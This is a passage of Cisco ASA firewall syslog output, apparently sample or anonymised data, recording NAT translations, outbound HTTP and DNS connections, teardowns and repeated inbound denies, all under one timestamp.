0:00:00 bytes 375 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:100.66.192.44/80 (100.66.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:100.66.98.44/8277 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:100.66.19.254/80 (100.66.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:100.66.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:100.66.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:100.66.98.44/8278 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:100.66.115.46/80 (100.66.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:100.66.98.44/8279 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1190 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:100.66.14.30/53 (100.66.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:100.66.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:100.66.252.210/53 (100.66.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:100.66.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:100.66.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:100.66.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:100.66.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:100.66.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:100.66.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:100.66.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:100.66.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:100.66.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:100.66.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:100.66.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:100.66.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:100.66.100.107/53 (100.66.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:100.66.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:100.66.104.8/53 (100.66.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:100.66.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:100.66.98.44/8293 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:100.66.123.191/80 (100.66.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:100.66.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:100.66.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:100.66.98.44/8294 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:100.66.198.25/80 (100.66.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:100.66.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:100.66.98.44/8276 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:100.66.162.30/53 (100.66.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:100.66.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:100.66.48.186/53 (100.66.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:100.66.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:100.66.98.44/8295 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:100.66.254.94/53 (100.66.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:100.66.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:100.66.98.44/8296 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:100.66.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:100.66.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:100.66.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:100.66.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:100.66.179.9/53 (100.66.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:100.66.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:100.66.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:100.66.247.99/80 (100.66.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:100.66.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:100.66.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:100.66.98.44/8308 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:100.66.0.124/53 (100.66.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:100.66.160.2/53 (100.66.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:100.66.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:100.66.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:100.66.98.44/8309 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from 